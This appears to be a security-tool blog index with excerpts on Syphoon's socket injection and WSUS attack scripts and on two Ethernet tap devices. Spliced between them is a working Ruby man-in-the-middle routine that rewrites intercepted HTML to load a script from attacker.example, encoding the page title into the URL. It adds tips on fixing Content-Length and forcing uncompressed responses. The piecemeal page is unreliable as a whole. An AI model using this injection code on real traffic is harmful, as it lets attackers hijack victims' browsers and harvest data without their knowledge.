The power of dynamic socket injection: WSUS command execution as [NT AUTHORITY\SYSTEM]
Context
Some time ago we published an important update to Syphoon, featuring the new dynamic socket injection system. In short, this allows using Ruby code to generate injected content on the fly, so that each injection can depend on its context.

Taking things further
To demonstrate the power of dynamic injections, we thought we'd publish a new release of Syphoon, this time including some new scripts. Specifically, two new scripts are provided to attack Windows Server Update Services (WSUS) when clients are configured to reach the update server over plain HTTP rather than HTTPS.

wsus-inject-cmd
This first script simply allows running commands (through cmd.exe) as 'NT AUTHORITY\SYSTEM' on any client machine that fetches its updates from WSUS over HTTP. This is...
Pwn harder with dynamic injection in Syphoon 1.4.0
The best socket injection system just got better
Socket injection is big fun for sure. Easily drop XSS-based attacks on victim browsers with a simple regex, inject payloads into SMTP/POP e-mails, or simply embed raccoon pictures in every web page. However, static strings can only take us so far. There comes a point when we start thinking it would be nice for the injected string to be a bit more flexible, maybe even dependent on specific conditions for each injection. This takes us into the realm of dynamic injection.

Introducing dynamic injection
Instead of simply asking Syphoon to insert some...
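The contrast between a static rule and a dynamic one, as an added Ruby example that is not Syphoon's code and does not use its API: a rule's payload is either a fixed string or a lambda that builds the injected content from what the regex matched and from the response headers. The Rule struct, the hook URL attacker.example and the sample HTTP response are assumptions made for this example, not anything from the original post.

```ruby
# Added example, not Syphoon's own API: a static injection rule beside a
# dynamic one, both applied to a plain HTTP response.
require 'uri'

# A rule pairs a regex with a payload. The payload is either a String
# (static injection) or a callable receiving (MatchData, headers) and
# returning the String to insert (dynamic injection). The inserted content
# is placed immediately before the match.
Rule = Struct.new(:pattern, :payload)

# Hypothetical attacker-controlled hook URL (assumption for the example).
STATIC_PAYLOAD = '<script src="http://attacker.example/hook.js"></script>'
STATIC_RULE = Rule.new(%r{</body>}i, STATIC_PAYLOAD)

# Dynamic rule: the payload is generated per response from what was matched,
# here the page title, which is URL-encoded into the hook URL.
DYNAMIC_RULE = Rule.new(%r{<title>(.*?)</title>}im, lambda { |m, _headers|
  tag = URI.encode_www_form_component(m[1])
  %(<script src="http://attacker.example/hook.js?page=#{tag}"></script>)
})

# Case-insensitive header lookup (HTTP header names are case-insensitive).
def header(headers, name)
  headers.find { |k, _| k.casecmp?(name) }&.last
end

# Split a raw HTTP response into [status line, headers hash, body].
def parse_http_response(raw)
  head, body = raw.split("\r\n\r\n", 2)
  status, *header_lines = head.split("\r\n")
  headers = header_lines.map { |l| k, v = l.split(':', 2); [k.strip, v.to_s.strip] }.to_h
  [status, headers, body.to_s]
end

# Only plain HTML bodies can be rewritten in place: a compressed or chunked
# body would have to be decoded first, so such responses are passed through.
def injectable?(headers)
  header(headers, 'Content-Type').to_s.start_with?('text/html') &&
    header(headers, 'Content-Encoding').nil? &&
    !header(headers, 'Transfer-Encoding').to_s.casecmp?('chunked')
end

# Apply one rule to a raw response and return the rewritten response.
def inject(raw, rule)
  status, headers, body = parse_http_response(raw)
  return raw unless injectable?(headers)

  new_body = body.sub(rule.pattern) do |matched|
    payload = rule.payload
    content = payload.respond_to?(:call) ? payload.call(Regexp.last_match, headers) : payload
    content + matched
  end
  return raw if new_body == body

  # Fix Content-Length, or the client truncates the injected body.
  key = headers.keys.find { |k| k.casecmp?('Content-Length') }
  headers[key] = new_body.bytesize.to_s if key

  ([status] + headers.map { |k, v| "#{k}: #{v}" }).join("\r\n") + "\r\n\r\n" + new_body
end

# Constructed sample response for the example (not captured traffic).
SAMPLE_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'Content-Length: 71',
  '',
  '<html><head><title>Intranet Portal</title></head><body>hi</body></html>'
].join("\r\n")

if __FILE__ == $PROGRAM_NAME
  puts inject(SAMPLE_RESPONSE, STATIC_RULE)
  puts
  puts inject(SAMPLE_RESPONSE, DYNAMIC_RULE)
end
```

Two details matter in practice whatever tool does the injecting: the Content-Length header has to be recomputed after the body grows, and a gzip-compressed or chunked body cannot be patched with a regex at all, which is why injecting proxies usually strip Accept-Encoding from the client's request so the server answers with a plain body.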
Skunk firmware 1.2.0 released - VLAN support, multiple sniff output ports and more
After reading many of your messages about the Skunk and its features, I was able to get a better understanding of what most users needed. I took some time over the past few days to implement the features that seemed to warrant the most attention. So here it is (finally): version 1.2.0 of the Skunk firmware. In this article I will present the changes brought along by this new update.

A better command-line interface
One of the key advantages of the Skunk is the simplicity with which it can be configured, simply by plugging in a...
Introducing Netsplit: a pocket-sized passive Ethernet tap
Meet the Swiss pocket knife of network traffic inspection
Netsplit is a passive Ethernet tap, making it easy to sniff packets across Ethernet links. Place the Netsplit between two devices and monitor their traffic on the tap ports. It works by forcing the devices into 10/100 mode, also known as "Fast Ethernet", which rules out gigabit-speed communication but is well suited for passive monitoring: at 10/100 each direction travels on its own dedicated wire pair, whereas gigabit Ethernet drives all four pairs in both directions at once and cannot be split passively. The two ports at the ends of the Netsplit are wired together as in a standard cable. However, their respective transmission lines are mirrored to the center "tap" ports. Because only the transmission lines are mirrored to...